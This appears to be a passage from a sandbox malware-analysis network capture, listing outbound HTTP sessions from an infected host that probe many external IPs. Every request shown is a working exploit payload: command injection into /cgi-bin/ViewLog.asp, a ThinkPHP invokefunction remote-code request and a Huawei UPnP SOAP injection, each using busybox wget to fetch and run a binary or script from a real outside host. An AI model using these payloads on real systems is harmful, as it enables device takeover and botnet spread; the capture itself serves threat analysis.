                                                        Apr 14, 2024 16:36:56.437459946 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:58.357325077 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:02.388628960 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:10.067715883 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:25.425626040 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:57.165190935 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        767192.168.2.233671685.227.81.1988080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:55.470649958 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        768192.168.2.2334710112.161.195.12880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:56.046029091 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:56.335066080 CEST516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Sun, 14 Apr 2024 14:36:55 GMT
                                                        Server: lighttpd/1.4.33
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        769192.168.2.2351546112.136.164.1080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:56.050441027 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:56.344029903 CEST201INHTTP/1.1 400 Invalid Request
                                                        Date: Sun, 14 Apr 2024 14:36:56 GMT
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 48 54 54 50 20 45 72 72 6f 72 3a 20 34 30 30 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a
                                                        Data Ascii: <HTML><HEAD></HEAD><BODY>HTTP Error: 400</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        770192.168.2.2351302112.49.30.16480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:56.198359966 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:56.621603012 CEST192INHTTP/1.1 404 Not Found
                                                        Content-Length: 0
                                                        X-NWS-LOG-UUID: 1159230463497157463
                                                        Connection: close
                                                        Server: stsoc_lego1
                                                        Date: Sun, 14 Apr 2024 14:36:56 GMT
                                                        X-Cache-Lookup: Return Directly
                                                        Apr 14, 2024 16:36:58.760867119 CEST192INHTTP/1.1 404 Not Found
                                                        Content-Length: 0
                                                        X-NWS-LOG-UUID: 1159230463497157463
                                                        Connection: close
                                                        Server: stsoc_lego1
                                                        Date: Sun, 14 Apr 2024 14:36:56 GMT
                                                        X-Cache-Lookup: Return Directly


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        771192.168.2.233976688.198.110.5380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:56.502309084 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:56.805927038 CEST295INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:56 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        772192.168.2.235898288.99.149.20280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:56.506901979 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:56.815263987 CEST490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:36:56 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        773192.168.2.2351316112.49.30.16480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:56.610014915 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:57.037435055 CEST193INHTTP/1.1 404 Not Found
                                                        Content-Length: 0
                                                        X-NWS-LOG-UUID: 11271022956155102925
                                                        Connection: close
                                                        Server: stsoc_lego1
                                                        Date: Sun, 14 Apr 2024 14:36:56 GMT
                                                        X-Cache-Lookup: Return Directly


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        774192.168.2.235540841.47.63.21737215
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:56.728759050 CEST828OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.62.248.103 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                        Apr 14, 2024 16:36:57.131266117 CEST182INHTTP/1.1 500 Internal Server Error
                                                        Content-Type: text/xml; charset="utf-8"
                                                        Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                        EXT:
                                                        Connection: Keep-Alive
                                                        Content-Length: 398


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        775192.168.2.233838094.122.232.2228080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:57.162626028 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        776192.168.2.235537488.99.70.23280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:58.128684998 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:58.436758041 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:58 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        777192.168.2.234290231.136.113.1718080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:58.181622982 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:01.364752054 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:07.507916927 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:19.538455963 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:44.878792048 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        778192.168.2.234804262.29.31.808080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:58.185076952 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:02.388593912 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:08.531815052 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
